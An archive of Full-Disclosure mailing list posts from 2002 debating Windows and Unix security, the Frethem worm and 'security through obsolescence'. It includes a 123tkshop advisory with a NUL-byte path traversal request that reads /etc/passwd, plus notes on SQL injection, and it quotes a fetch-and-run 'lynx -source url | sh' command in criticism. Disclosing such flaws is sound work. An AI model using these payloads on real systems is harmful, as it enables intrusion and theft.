So, security professionals who don't mind getting dirty should, by all means, help their clients patch up their Windows networks. (I happen to mind getting dirty, so I decline that work.) But all security professionals should help their clients maintain perspective, and realize that fighting with Windows is not a long-term viable solution. (And those same professionals, by the way, should be critical of developments in the Linux world like GNOME's installer: "lynx -source url | sh". This is just as bad as the worst Windows design.) -- David. From csnow at deltadentalwa.com Mon Jul 15 18:13:37 2002 From: csnow at deltadentalwa.com (Snow, Corey) Date: Mon, 15 Jul 2002 10:13:37 -0700 Subject: [Full-Disclosure] List Charter Message-ID: at 02:48:33PM +0100, John Cartwright wrote: > > > We're contemplating the creation of a list charter, and welcome > > your ideas. Whether this occurs on- or off-list is entirely up > > to you, the members. > > Hi > > A draft charter is now available at > http://lists.netsys.com/full-disclosure-charter.html > > Comments? > Something to add to the "Acceptable Content" section- it should be stipulated that actual exploits (i.e., posting a worm in working format hoping to hurt those evil Outlook users) or other directly malicious (malicious to list readers, that is) is verboten. In other words, exploit code and such is fine, as long as it's not active when you read the message. Anyone who got hit with something like that arguably might deserve it (I'd never argue such a position myself, because I don't think that being uneducated is a crime deserving of punishment), but the list should never be the vector of attack for anyone on it, successful or not. Corey Snow ######################################################### The information contained in this e-mail and subsequent attachments may be privileged, confidential and protected from disclosure. 
This transmission is intended for the sole use of the individual and entity to whom it is addressed. If you are not the intended recipient, any dissemination, distribution or copying is strictly prohibited. If you think that you have received this message in error, please e-mail the sender at the above e-mail address. ######################################################### From markjw at lightlink.com Mon Jul 15 22:50:12 2002 From: markjw at lightlink.com (Mark J. Walborn) Date: Mon, 15 Jul 2002 17:50:12 -0400 Subject: [Full-Disclosure] w32.frethem.k@mm and good reading References: Message-ID: <03c201c22c49$994e3770$1031020a@home.barrington.com> Has anyone encountered the above mentioned worm? Several anti-viral software companies have posted updates as of midnight.. Also, I found the following article of interest. By Robin Miller, NewsForge.com > Posted: 06/06/2002 at 12:10 GMT > Here's an interesting way to secure an Internet-connected > computer against intruders: Make sure the operating system and > software it runs are so old that current hacking tools won't work on > it. This was suggested by Brian Aker, one of the programmers who works > on Linux.com, NewsForge, Slashdot, and other OSDN sites; he runs > several servers of his own that host a number of small non-profit > sites in the Seattle area. "I have one box still running a version of > Solaris that's so old none of the script kiddies can figure it out," > Brian says. "They tend to focus on the latest and greatest, and don't > have the slightest idea how to handle my old Sun box." > Brian points out that some of the most secure Department of Defense > Web sites -- ones that don't make headlines by getting cracked all the > time -- run old versions of Mac OS and the venerable WebSTAR server > suite. "[Mac is] a great operating system for that application," he > says. "No scripting or remote capability at all, so there's no way for > them to get in."
> Not only that, the hacker/cracker crowd is fixating, as usual, on the > latest versions of everything, like Windows 2K/XP, Mac OS X, the most > recent Linux kernels and BSDs, the newest Solaris, and so on. What fun > is there in breaking into a system running something so ancient only a > dad would even consider using it? There's also an obscurity factor to > consider here, and not the one proprietary software advocates usually > trot out when discussing security issues. > True "security through obscurity" > Most Web site takedowns and system intrusions make use of known > vulnerabilities in a particular operating system or server software > package. These vulnerabilities are typically discovered, a little at a > time, by thousands of bad hackers who poke and prod at systems, > port-scanning and probing them, sharing the information they gain from > their (mostly failed) attempts with each other. A million monkeys with > Internet connections may not reproduce any Shakespeare plays -- they > need to use old-fashioned typewriters to do that -- but they sure as > bleep are going to find vulnerabilities in any host they contact > sooner or later simply by sheer weight of numbers, especially if the > operating system or software they attack is popular enough that they > have many instances of it out there to look and poke at. It doesn't > matter whether the operating system and server software under attack > is proprietary or Open Source. Sooner or later, with enough monkeys > scratching at it, every single chink or opening can be discovered and > exploited. > Imagine a custom operating system used by only a few servers, running > server software so oddball that cracking lessons learned on mainstream > servers don't apply to it at all. 
Or imagine running a DOS variant or > an OS like AIX that has never been widely used for Net-attached > servers but is adequate for handing out simple Web pages and receiving > responses through online forms and handling email, which are the > primary tasks performed on most publicly-accessible servers. > Now imagine your local script kiddie trying to crack a box running an > operating system and server software he's never seen before, about > which no information is available in the usual online hacker hangouts. > Chances are, he's going to move on to an easier target. > This is security through obscurity at its finest. Even if the custom > operating system and server software are Open Source, low-level > attackers aren't going to bother poring over the code thoroughly > enough to find its vulnerabilities, and those few who have the skill > level needed almost certainly have better things to do with their time > -- like work -- and won't bother. > Really dumb stuff > Never forget, most intrusions and defacements exploit really stupid > administrator or user mistakes, like using "password" as the password > for remote access or running all kinds of unnecessary services that > create security holes so big a whale could dive through them. These > lapses have nothing to do with the operating system or software being > used. No operating system or application ever written is immune to > user stupidity. Some just take more stupidity to botch than others, > you might say. But that's enough about that. Let's go back to talking > about old operating systems. > Age before beauty > One advantage of mature software is that lots of people have already > tried to crack it and lots of patches have been written. A smart > sysadmin like Brian, running an ancient version of Solaris, has kept > up with security updates over the years and has installed all of them > he has found. 
What some people might sneer at as "obsolete" software, > others might call "carefully tested" or "proven." Indeed, Debian Linux > users often point to the fact that Debian's stable branch does not > include the latest kernel or software as one of its great strengths; > Debian lets others explore the latest and greatest -- and fall victim > to the latest and greatest exploits -- before all the kinks are worked > out to the Debian maintainers' satisfaction. > Note that an awful lot of servers out there are still running on Red > Hat 6.1 or 6.2, not Red Hat 7.x, and that it takes a long time for the > latest version of Apache to trickle out into the world full-strength. > Because these programs have zero licensing cost attached to updates, > why would so many sysadmins keep using old versions when new ones no > doubt offer more and slicker features? Obviously, those sysadmins have > the same outlook as delivery truck fleet managers who refuse to buy a > new model during its first year or two in production. They prefer to > wait until all the kinks are worked out and all the defects and > maintenance tricks have been discovered and applied by early adopters > before jumping from the tried and true into something new. > This is sane behavior for a conservative business manager whether she > is running a fleet of Web servers or a fleet of trucks -- or even a > fleet of Web servers for a trucking company. But it may be even more > sane to hold on to the same servers and trucks even when others sneer > at them as being old, even if new versions are smoother and easier to > administer or drive. Quite simply, once you have worked with a piece > of software or a truck for a number of years, you know its quirks > inside and out. When it acts up in a subtle way someone not used to it > might not even notice, long experience with it can point an observant > sysadmin or mechanic straight to a problem, thereby saving downtime > and repair costs. 
> Because "Total Cost of Ownership" is the big management buzz phrase
> that cuts across all business areas, and anything new requires a
> learning curve, sometimes it is best to just keep on using the old
> whatever as long as it does its job reasonably well.
>
> At some point -- hopefully before Microsoft stops supporting it --
> Windows NT may be reasonably secure against most common exploits. If
> nothing else, by that time there will be hundreds of thousands of
> sysadmins who have learned how to secure it as hard as possible, even
> if they had to learn some lessons the hard way -- by getting cracked.
>
> At the same time, the script kiddies and malicious hackers who ran
> roughshod over NT servers when they first appeared have aged. Most of
> them probably have jobs and responsibilities by now, and aren't
> getting their kicks playing in other people's systems but are busily
> securing ones they run themselves.
>
> The next generation of bad-kid hackers probably won't mess much with
> NT -- or pre-X Mac OS or Linux pre-2.5 kernels or Apache pre-2.x or
> any of the other operating systems and server applications their
> fathers or older siblings ran "back in the day," while those same
> fathers and older siblings will have piled up endless experience
> securing those old, now-obscure programs, making them harder targets
> than the latest stuff.
>
> You never read about this kind of "security through obscurity," which
> can just as correctly be called "security through obsolescence."
> Despite this lack of publicity, it may be as effective a tactic as any
> other, and it can be implemented without spending a dime.
>
> © Newsforge. All rights reserved

From pauls at utdallas.edu Mon Jul 15 18:46:00 2002
From: pauls at utdallas.edu (Schmehl, Paul L)
Date: Mon, 15 Jul 2002 12:46:00 -0500
Subject: [Full-Disclosure] w32.frethem.k@mm and good reading
Message-ID: <871080DEC5874D41B4E3AFC5C400611E026EE347@UTDEVS02.campus.ad.utdallas.edu>

Yes.
It seems to be making some headway in Europe, but not so much in the US yet. Haven't heard anything about the Far East yet. Interesting article, BTW.

Paul Schmehl (pauls at utdallas.edu)
Supervisor of Support Services
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/~pauls/

> -----Original Message-----
> From: Mark J. Walborn [mailto:markjw at lightlink.com]
> Sent: Monday, July 15, 2002 4:50 PM
> To: full-disclosure at lists.netsys.com
> Subject: [Full-Disclosure] w32.frethem.k at mm and good reading
>
>
> Has anyone encountered the above mentioned worm? Several
> anti-viral software companies have posted updates as of midnight..

From mail at blazde.co.uk Mon Jul 15 19:58:08 2002
From: mail at blazde.co.uk (Roland Postle)
Date: Mon, 15 Jul 2002 19:58:08 +0100
Subject: [Full-Disclosure] Counseling not to use Windows (was Re: Anonymous surfing my ass\!)
References:
Message-ID: <002d01c22c31$9002afb0$0a00a8c0@violetclub>

> because of programming errors. Encoding metadata such as "executableness"
> in a filename, for example, is a fundamental design flaw, and one that's
> impossible to correct without changing Windows' design.

Sorry to pick on your example but an extension merely indicates what kind of data is in the file. A .txt extension suggests that a user might want to hand the file to a program that'll treat the file as plain ASCII, similarly an .exe extension suggests that a user might want to give the file some memory and time slices and treat it as a program in its own right. You could load the .exe into notepad, and you could execute the .txt file.

As for the actual security of whether a user /can/ execute a file, Windows doesn't separate 'read' and 'execute' privileges well enough. However it's my understanding that's got more to do with the design of the x86 memory architecture than Windows' design. Linux just pretends to separate 'r' and 'x' privs because it's a unix clone. I'm prepared to stand corrected on that though.
I agree completely that Windows does have some fundamental design flaws that prevent it being locally secure. A better example might be the ability of an application to send messages to another application, apparently without regard for who the owner of the target application is.

- Blazde

From dfs at roaringpenguin.com Mon Jul 15 20:10:12 2002
From: dfs at roaringpenguin.com (David F. Skoll)
Date: Mon, 15 Jul 2002 15:10:12 -0400 (EDT)
Subject: [Full-Disclosure] Counseling not to use Windows (was Re: Anonymous surfing my ass\!)
In-Reply-To: <002d01c22c31$9002afb0$0a00a8c0@violetclub>
Message-ID:

On Mon, 15 Jul 2002, Roland Postle wrote:

> > because of programming errors. Encoding metadata such as "executableness"
> > in a filename, for example, is a fundamental design flaw, and one that's
> > impossible to correct without changing Windows' design.

> Sorry to pick on your example but an extension merely indicates what kind of
> data is in the file.

Not under Windows as it is configured by 99.99% of end-users. If you name a file "foo.txt", very different things happen if you click on the file than if you click on the exact same file named "foo.exe".

> A .txt extension suggests that a user might want to
> hand the file to a program that'll treat the file as plain ASCII, similarly
> an .exe extension suggests that a user might want to give the file some
> memory and time slices and treat it as a program in its own right. You
> could load the .exe into notepad, and you could execute the .txt file.

Again, for 99.99% of end users, such fine points are irrelevant. To them, clicking on an .exe runs the program. Windows even "helpfully" hides the extension by default.

> As for the actual security of whether a user /can/ execute a file, Windows
> doesn't separate 'read' and 'execute' privileges well enough. However it's
> my understanding that's got more to do with the design of the x86 memory
> architecture than Windows' design.
> Linux just pretends to separate 'r' and
> 'x' privs because it's a unix clone. I'm prepared to stand corrected on that
> though.

That is true when it comes to memory protection, but what you're talking about is filesystem protection, and Linux doesn't "pretend" anything -- it enforces it. I believe it is possible under some versions of Windows to allow read access but not execute access to files and directories, but again, 99% of end-users don't know this and don't configure it.

> I agree completely that Windows does have some fundamental design flaws that
> prevent it being locally secure. A better example might be the ability of an
> application to send messages to another application, apparently without
> regard for who the owner of the target application is.

:-) I'm not familiar enough with Windows to be aware of things like that. Thanks.

Regards,

David.

From dufresne at winternet.com Mon Jul 15 20:10:07 2002
From: dufresne at winternet.com (Ron DuFresne)
Date: Mon, 15 Jul 2002 14:10:07 -0500 (CDT)
Subject: [Full-Disclosure] w32.frethem.k@mm and good reading
In-Reply-To: <03c201c22c49$994e3770$1031020a@home.barrington.com>
Message-ID:

On Mon, 15 Jul 2002, Mark J. Walborn wrote:

> Has anyone encountered the above mentioned worm? Several anti-viral software
> companies have posted updates as of midnight..
>

Trend Micro released this announcement on it recently:

This non-destructive, memory-resident variant of WORM_FRETHEM.D propagates via email. It arrives as an attachment with the following details:

Subject: Re: Your password!
Message Body: You can access very important information by this password DO NOT SAVE password to disk use your mind now presscancel
Attachment: DECRYPT-PASSWORD.EXE PASSWORD.TXT

On systems with unpatched Internet Explorer, the file attachments automatically execute when this email message is previewed or opened in Microsoft Outlook and Outlook Express. WORM_FRETHEM.K is detected by pattern file #317.
For more information on WORM_FRETHEM.K please visit our Web site at:
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_FRETHEM.K

> Also, I found the following article of interest.
>
> By Robin Miller, NewsForge.com
>
> Posted: 06/06/2002 at 12:10 GMT

[article SNIPPED]

The article in question discusses security through obscurity, which is not viewed as sound by most folks in the security arena. If the skript kiddies looked hard enough they surely could find older sploits for such systems, if they took the time to attempt to identify the underlying OS to any degree, and surely better crackers will take that time.

Of course there is this bit on the issue recently:

How often hackers attack, and what they're after. Attack activity against corporate networks went up significantly in the first half of 2002 when compared with the second half of 2001, but the good news is that the incidence of highly sophisticated attacks was low between January and June this year. Despite the increased activity, the number of attacks that are considered highly aggressive or sophisticated was less than 1 percent. When highly aggressive attacks occur, they are more than 26 times more likely to have severe effects than attacks that are classified as moderately aggressive, so even the small percentage of such attacks remains cause for concern. (Internet Week, 11 Jul)

Which begs the question, are more sophisticated attacks really reduced, or are more of them actually going undetected?

Thanks,

Ron DuFresne
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***
OK, so you're a Ph.D. Just don't touch anything.
From dotslash at snosoft.com Mon Jul 15 17:59:31 2002
From: dotslash at snosoft.com (KF)
Date: Mon, 15 Jul 2002 12:59:31 -0400
Subject: [Full-Disclosure] security through obsolescence??!@?!
References: <03c201c22c49$994e3770$1031020a@home.barrington.com>
Message-ID: <3D32FF73.6020809@snosoft.com>

This has to be one of the stupidest comments I have ever heard! Do you honestly think that there are not people with REAL skill out there... not just simple skript kiddies. I certainly hope that you wouldn't try to "secure" your network with an old redhat 4.2 box, Xenix or an old NT 3.51 server. Installing old software is NOT an effective means of warding off attackers... in fact you may attract a more "old school" with "0-day" from back in their day. There has to be numerous issues in those old OS's that people have not told the vendors ... there were never any public patches made ... etc. Don't kid yourselves... and if you REALLY think this works... be so kind as to give us the IP addresses for these legacy machines.

-KF

>> Posted: 06/06/2002 at 12:10 GMT
>> [724.gif] Here's an interesting way to secure an Internet-connected
>> computer against intruders: Make sure the operating system and
>> software it runs are so old that current hacking tools won't work on
>> it. This was suggested by Brian Aker, one of the programmers who works
>> on Linux.com, NewsForge, Slashdot, and other OSDN sites; he runs
>> several servers of his own that host a number of small non-profit
>> sites in the Seattle area. "I have one box still running a version of
>> Solaris that's so old none of the script kiddies can figure it out,"
>> Brian says. "They tend to focus on the latest and greatest, and don't
>> have the slightest idea how to handle my old Sun box."
>>
>
>

From mail at blazde.co.uk Mon Jul 15 20:35:14 2002
From: mail at blazde.co.uk (Roland Postle)
Date: Mon, 15 Jul 2002 20:35:14 +0100
Subject: [Full-Disclosure] Counseling not to use Windows (was Re: Anonymous surfing my ass\!)
References:
Message-ID: <008001c22c36$ee4e4c00$0a00a8c0@violetclub>

I should mention that I'm only referring to Windows NT here, Windows 9x /is/ one monumental design flaw and not even worth talking about.

> That is true when it comes to memory protection, but what you're
> talking about is filesystem protection, and Linux doesn't "pretend"
> anything -- it enforces it. I believe it is possible under some
> versions of Windows to allow read access but not execute access to
> files and directories, but again, 99% of end-users don't know this
> and don't configure it.

It's hardly a 'fundamental design flaw' if it can be configured differently. Many default unix installations will leave all a user's newly created files with world read access. And I bet the vast majority of novice computer users (the ones most at risk) would find it easier to change their file permissions on a Windows machine than a unix machine. The fact that 99% of Windows users are clueless is no reflection on Windows' actual security.

- Blazde

From pauls at utdallas.edu Mon Jul 15 20:59:59 2002
From: pauls at utdallas.edu (Schmehl, Paul L)
Date: Mon, 15 Jul 2002 14:59:59 -0500
Subject: [Full-Disclosure] Counseling not to use Windows (was Re: Anonymoussurfing my ass\!)
Message-ID: <871080DEC5874D41B4E3AFC5C400611E026EE417@UTDEVS02.campus.ad.utdallas.edu>

Comments inline.

Paul Schmehl (pauls at utdallas.edu)
Supervisor of Support Services
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/~pauls/

> -----Original Message-----
> From: David F. Skoll [mailto:dfs at roaringpenguin.com]
> Sent: Monday, July 15, 2002 2:10 PM
> To: full-disclosure at lists.netsys.com
> Subject: Re: [Full-Disclosure] Counseling not to use Windows
> (was Re: Anonymoussurfing my ass\!)
>
>
> > Sorry to pick on your example but an extension merely indicates what
> > kind of data is in the file.
>
> Not under Windows as it is configured by 99.99% of end-users.
> If you name a file "foo.txt", very different things happen
> if you click on the file than if you click on the exact same
> file named "foo.exe".

That depends on how the admins configure things. :-) Here at UTD, for example, it isn't possible to execute a VBS file unless you know what you're doing. It's also possible to restrict the executables that a user can run, using group policies.

>
> > A .txt extension suggests that a user might want to
> > hand the file to a program that'll treat the file as plain ASCII,
> > similarly an .exe extension suggests that a user might want to give
> > the file some memory and time slices and treat it as a
> program in its
> > own right. You could load the .exe into notepad, and you
> could execute
> > the .txt file.
>
> Again, for 99.99% of end users, such fine points are
> irrelevant. To them, clicking on an .exe runs the program.
> Windows even "helpfully" hides the extension by default.

And you think they will do *better* at this in *nix? You've pinpointed the problem, but missed the solution. The problem is the *users* who are ignorant and chose to remain that way. The solution is for the *conscientious* admins to understand that truth and find ways to defend the enterprise *anyway*.

>
> That is true when it comes to memory protection, but what
> you're talking about is filesystem protection, and Linux
> doesn't "pretend" anything -- it enforces it. I believe it
> is possible under some versions of Windows to allow read
> access but not execute access to files and directories, but
> again, 99% of end-users don't know this and don't configure it.

Your ignorance of Windows is showing.
It is possible, under all "modern" versions of Windows (not the 9x variety) to get as granular as this (at the directory or file level):

Full Control
Traverse Folder / Execute File
List Folder / Read Data
Read Attributes
Read Extended Attributes
Create Files / Write Data
Create Folders / Append Data
Write Attributes
Write Extended Attributes
Delete
Read
Change
Take Ownership

It isn't the OS that's the problem. It's the manufacturer's choices of default settings and the ignorance of the users (and admins in many cases.) Isn't this precisely the same problem on *nix? Give me an ignorant user on a default install of *nix and I'll give you a hacked box in a few minutes (except perhaps OpenBSD, which is one of the few that ship "secure" out of the box.)

Please don't misunderstand - I am NOT saying Windows is as good as or as secure as Unix. Given the choice, I'll take OpenBSD. But the *real* problem isn't software, it's humans.

From steve at entrenchtech.com Mon Jul 15 21:03:24 2002
From: steve at entrenchtech.com (Steve)
Date: Mon, 15 Jul 2002 14:03:24 -0600
Subject: [Full-Disclosure] Counseling not to use Windows (was Re: Anonymous surfing my ass\!)
In-Reply-To: <008001c22c36$ee4e4c00$0a00a8c0@violetclub>
Message-ID: <001101c22c3a$b08e3430$6501a8c0@Laptop2>

>
> The fact that 99% of Windows users are clueless is no
> reflection on Windows' actual security.
>

I agree. I have some very large clients with thousands of workstations and thousands of servers and there is no way in hell that they will change all their workstations from Win2K to a *NIX distro based on some security scare tactics and FUD. Sure, new servers being put in, depending on their use and the IT department's expertise can be *NIX based and many are. Yet, with my help, they have had clueless users open malicious emails and have the attached worm fail -- why? Because each and every workstation is locked down appropriately and still functions fully. Yeah it's a lot of work, but it can be done.
Making the general statement to not use Windows shows nothing but ignorance of the configuration options available. Granted, if an organization was using nothing but Win98 then yes, I would say to them that they need to upgrade, but they can upgrade to a Windows O/S if they want. Hey if you don't know Windows just say so, we aren't going to laugh at you because you have the ability to understand *nix but not the easy point and crash Windows. :-) heh From dfs at roaringpenguin.com Mon Jul 15 21:14:01 2002 From: dfs at roaringpenguin.com (David F. Skoll) Date: Mon, 15 Jul 2002 16:14:01 -0400 (EDT) Subject: [Full-Disclosure] Counseling not to use Windows (was Re: Anonymous surfing my ass\!) In-Reply-To: <008001c22c36$ee4e4c00$0a00a8c0@violetclub> Message-ID: On Mon, 15 Jul 2002, Roland Postle wrote: > I should mention that I'm only referring to Windows NT here, Windows 9x /is/ > one monumental design flaw and not even worth talking about. > It's hardly a 'fundamental design flaw' if it can be configured differently. Well, OK. But let's say you tighten up security on NT. Then you discover that all kinds of third-party (and Microsoft, for that matter) software doesn't work any more. > Many default unix installations will leave all a user's newly created files > with world read access. That's true. World-read access is slightly less of a problem than world-execute access. And some Linux distros (e.g. Mandrake) offer "security levels" which (among other things) let you change the default umask to 077. > And I bet the vast majority of novice computer users > (the ones most at risk) would find it easier to change their file > permissions on a Windows machine than a unix machine. Well, the vast majority of novice computer users aren't using UNIX (unless you count Mac OS X). > The fact that 99% of Windows users are clueless is no reflection on Windows' > actual security. 
But Microsoft touts "ease of use" which lulls people into believing that you don't need as much skill to use or secure Windows as UNIX. And that's irresponsible. -- David. From dfs at roaringpenguin.com Mon Jul 15 21:24:50 2002 From: dfs at roaringpenguin.com (David F. Skoll) Date: Mon, 15 Jul 2002 16:24:50 -0400 (EDT) Subject: [Full-Disclosure] Counseling not to use Windows (was Re: Anonymoussurfing my ass\!) In-Reply-To: <871080DEC5874D41B4E3AFC5C400611E026EE417@UTDEVS02.campus.ad.utdallas.edu> Message-ID: On Mon, 15 Jul 2002, Schmehl, Paul L wrote: > That depends on how the admins configure things. :-) Here at UTD, for > example, it isn't possible to execute a VBS file unless you know what > you're doing. Well, that's very good. How about .exe? > It's also possible to restrict the executables that a > user can run, using group policies. Yes, it is. How much work is it to set all this up? [...] > And you think they will do *better* at this in *nix? You've pinpointed > the problem, but missed the solution. The problem is the *users* who > are ignorant and chose to remain that way. The solution is for the > *conscientious* admins to understand that truth and find ways to defend > the enterprise *anyway*. That's true. Nevertheless, I contend that it's easier for conscientious admins to protect UNIX boxes from ignorant users than to protect Windows boxes (period.) In fact, UNIX boxes are extremely easy to protect from the truly computer-ignorant, and they're not bad for experts. It's the people in the middle who are dangerous on UNIX boxes. :-) For example, my parents run Linux at home. They are complete computer newbies. So I set everything up for them, locked down all the permissions, and they're fine. An occasional VNC session over SSH is all the help they need from me. Some of the people I've worked with, however, know enough about UNIX to be dangerous and often screw things up... > Your ignorance of Windows is showing. 
> It is possible, under all
> "modern" versions of Windows (not the 9x variety) to get as granular as
> this (at the directory or file level):

I fully admit to ignorance of the details of Windows security, although I believe I grasp the overall situation.

> Full Control
> Traverse Folder / Execute File
> List Folder / Read Data
> Read Attributes
> Read Extended Attributes
> Create Files / Write Data
> Create Folders / Append Data
> Write Attributes
> Write Extended Attributes
> Delete
> Read
> Change
> Take Ownership

These are granular indeed, and confusing as hell. A good security model should be simple; the Windows one is anything but. I can probably outline the UNIX security model in 300 words. I challenge any Windows user to do the same for Windows. And complexity is the enemy of security. It can lead to misunderstanding, incorrect implementation, and ambiguity.

> It isn't the OS that's the problem.

I disagree. The design of the OS is a large part of the problem. (I say "OS" here to include Microsoft applications like IE, which (after all) Microsoft insists are part of the OS.)

> It's the manufacturer's choices of
> default settings and the ignorance of the users (and admins in many
> cases.) Isn't this precisely the same problem on *nix? Give me an
> ignorant user on a default install of *nix and I'll give you a hacked
> box in a few minutes (except perhaps OpenBSD, which is one of the few
> that ship "secure" out of the box.)

That may have been true 3 or 4 years ago, but (at least in the Linux and *BSD worlds) is no longer. The default installation settings are pretty good nowadays.

> Please don't misunderstand - I am NOT saying Windows is as good as or as
> secure as Unix. Given the choice, I'll take OpenBSD. But the *real*
> problem isn't software, it's humans.

I'm not arguing with you on that point. But I think it's correct to say that any organization interested in long-term security planning should consider weaning itself away from proven-insecure software.
Microsoft's track record is really terrible, and I don't see any indications that things are changing. How much benefit of the doubt do vendors deserve, anyway?

-- David.

From steve at entrenchtech.com Mon Jul 15 21:24:49 2002
From: steve at entrenchtech.com (Steve)
Date: Mon, 15 Jul 2002 14:24:49 -0600
Subject: [Full-Disclosure] Counseling not to use Windows (was Re: Anonymous surfing my ass\!)
In-Reply-To:
Message-ID: <001301c22c3d$ae0510f0$6501a8c0@Laptop2>

>
> Well, OK. But let's say you tighten up security on NT. Then
> you discover that all kinds of third-party (and Microsoft, for that
> matter) software doesn't work any more.

Been there done that. You put yourself in a lab with test boxes, lock the machine down then slowly relax things until all the apps work. Then, when new custom apps are being developed, they get developed on the locked down platform and with good developers, this can work. Granted, a lot of organizations have problems with this but that's why I get paid. :-)

> But Microsoft touts "ease of use" which lulls people into
> believing that you don't need as much skill to use or secure
> Windows as UNIX. And that's irresponsible.

I agree. MS has always put usability over security. Hopefully things will change but I'm not holding my breath.

From avart at gmx.de Mon Jul 15 21:56:40 2002
From: avart at gmx.de (avart at gmx.de)
Date: Mon, 15 Jul 2002 22:56:40 +0200 (MEST)
Subject: [Full-Disclosure] Again NULL and addslashes() (now in 123tkshop)
Message-ID: <24546.1026766600@www31.gmx.net>

Hi!

Ok, another announcement about a php application containing unslashed SQL queries and bad include/require statements.

Several problems in 123tkshop
-------------------------------------

# What is 123tkshop?

123tkshop is an ecommerce software written in php. It's providing a full featured online shop. More information is available at:

#### include + NULL problem ####

# Problem description

There are several include statements which use variables passed by the user.
So if register_globals is on and magic_quotes_gpc is off you are able to read any file on the webserver:

function_foot_1.inc.php
[...]
include("styles/$designNo/footer.php");
[...]

# So what's the problem with NULL?

If $designNo contains NULL (aka \0 or %00) the include statement ignores everything after the NULL and includes the file. Here's some metacode explaining the behavior:

foobar.php looks like this:

Calling the file with the following parameter:

foobar.php?input=bla%00bla

results in (with enabled magic_quotes_gpc):
Warning: Failed opening '../bla\0blablubb' for inclusion (include_path='.:/usr/local/lib/php') in /home/user/public_html/foobar.php on line 2
This doesn't seem to be exploitable, but what happens if magic_quotes_gpc is turned off (like in php.ini-recommended, for performance reasons, without pointing to THIS kind of problem)?:
Warning: Failed opening '../bla' for inclusion (include_path='.:/usr/local/lib/php') in /home/user/public_html/foobar.php on line 2
Huh?! Did you get it? Everything after NULL (%00) is ignored! So what can we do now? We can take a look at the available users:

foobar.php?input=../../../etc/passwd%00

Voila... You can open every file you want. Ok, not every file. It has to be readable by the http-user, like wwwrun or www.

# And the solution?

One can test if a file exists with the function file_exists(). This function doesn't ignore the characters after NULL. On the other side, one could try to avoid using userdata to open a file.

# Fix?

The author released a new version (0.3.1) that checks _every_ file being included. You can download it at . If you aren't able to update an older version, enable "magic_quotes_gpc". See for further information about securing php applications.

#### missing addslashes() ####

# Problem description

A lot of data passed (there are just a few exceptions) to mysqld is NOT checked for control characters like ', " et al. So one is able to commit injected sql queries. The problem exists when magic_quotes_gpc is turned off. function_describe_item1.inc.php is one of the dangerous files.

For further information about dangerous sql queries see:
* .
*

# And the solution?

One can use addslashes() for _every_ piece of data a user enters that is submitted to the database. Lazy people hope that magic_quotes_gpc is enabled. Never expect that an admin configured a webserver correctly; try to start the security at application level.

# Fix?

The author will release a new version ASAP.

##### Credits #####

For the german-speaking folk:

--
GMX - Die Kommunikationsplattform im Internet.
http://www.gmx.net

From core at bokeoa.com Mon Jul 15 22:23:40 2002
From: core at bokeoa.com (Charles 'core' Stevenson)
Date: Mon, 15 Jul 2002 15:23:40 -0600
Subject: [Full-Disclosure] security through obsolescence??!@?!
References: <03c201c22c49$994e3770$1031020a@home.barrington.com> <3D32FF73.6020809@snosoft.com>
Message-ID: <3D333D5C.1070501@bokeoa.com>

kevin, word man... rexd to the rescue? hehe...
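Added example following the 123tkshop advisory above (not the advisory's, 123tkshop's or any list member's code): a hardened form of the `include("styles/$designNo/footer.php")` pattern and of request-to-SQL escaping with `addslashes()` as the advisory recommends. The helper names `valid_design_no`, `footer_path_for_design` and `sql_string_from_request` are assumptions made for this example; `$designNo`, `styles/.../footer.php`, `file_exists()` and `magic_quotes_gpc` are from the advisory.

```php
<?php
// Added example, not 123tkshop's code. Hardens the two patterns from the
// advisory above:
//   include("styles/$designNo/footer.php");        -> NUL / traversal
//   user data pasted into SQL string literals      -> missing addslashes()
// Helper names are assumptions made for this example.

// True only if $designNo is a non-empty string of ASCII digits. This
// rejects "../", an embedded NUL (\0, %00) and empty input before any
// filesystem call, so include() never sees a NUL-truncated path.
function valid_design_no($designNo)
{
    if (!is_string($designNo) || $designNo === '') {
        return false;
    }
    return ctype_digit($designNo);
}

// Resolve the footer for a design number, or return false. The caller
// then does: if ($p = footer_path_for_design($designNo)) include($p);
function footer_path_for_design($designNo, $base = 'styles')
{
    if (!valid_design_no($designNo)) {
        return false;
    }
    $path = "$base/$designNo/footer.php";
    // file_exists() is not fooled by an embedded NUL (as the advisory
    // notes), so this second check would still catch a NUL if the
    // allowlist above were ever loosened.
    return file_exists($path) ? $path : false;
}

// Escape one request value for use inside a single-quoted SQL string
// literal, whatever the magic_quotes_gpc setting: undo magic quoting
// first so the value is never escaped twice, then escape exactly once.
// (addslashes() is what the advisory recommends; on a current PHP/MySQL
// stack prepared statements replace this entirely.)
function sql_string_from_request($value)
{
    if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) {
        $value = stripslashes($value);
    }
    return addslashes($value);
}

// Self-check on constructed inputs (no files are touched).
$design_cases = array(
    array("1",                     true),   // ordinary design number
    array("12",                    true),
    array("",                      false),  // empty
    array("../../../etc/passwd\0", false),  // traversal + NUL, as in the advisory
    array("1\0x",                  false),  // valid prefix, NUL after it
    array("styles",                false),  // not numeric
);
foreach ($design_cases as $case) {
    list($input, $expected) = $case;
    if (valid_design_no($input) !== $expected) {
        die("valid_design_no failed for " . addcslashes($input, "\0..\37") . "\n");
    }
}

// The escaped quote can no longer end the SQL literal early.
$name = "O'Brien";
$sql  = "SELECT * FROM items WHERE owner = '" . sql_string_from_request($name) . "'";
if ($sql !== "SELECT * FROM items WHERE owner = 'O\\'Brien'") {
    die("sql_string_from_request failed\n");
}
echo "all checks passed\n";
```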
my god I know a couple of sysadmins who have the same philosophy. but it's pointless. it's like removing read privileges from vulnerable suids! some of us have over a gigabyte of security related exploits, scanners, sniffers, backdoors etc.. Dating back to the 80's. ;)

peace,
core

KF wrote:

> This has to be one of the stupidest comments I have ever heard! Do you
> honestly think that there are not people with REAL skill out there...
> not just simple skript kiddies. I certainly hope that you wouldn't try
> to "secure" your network with an old redhat 4.2 box, Xenix or an old NT
> 3.51 server. Installing old software is NOT an effective means of
> warding off attackers... in fact you may attract a more "old school" with
> "0-day" from back in their day. There has to be numerous issues in
> those old OS's that people have not told the vendors ... there were
> never any public patches made ... etc. Don't kid yourselves... and if
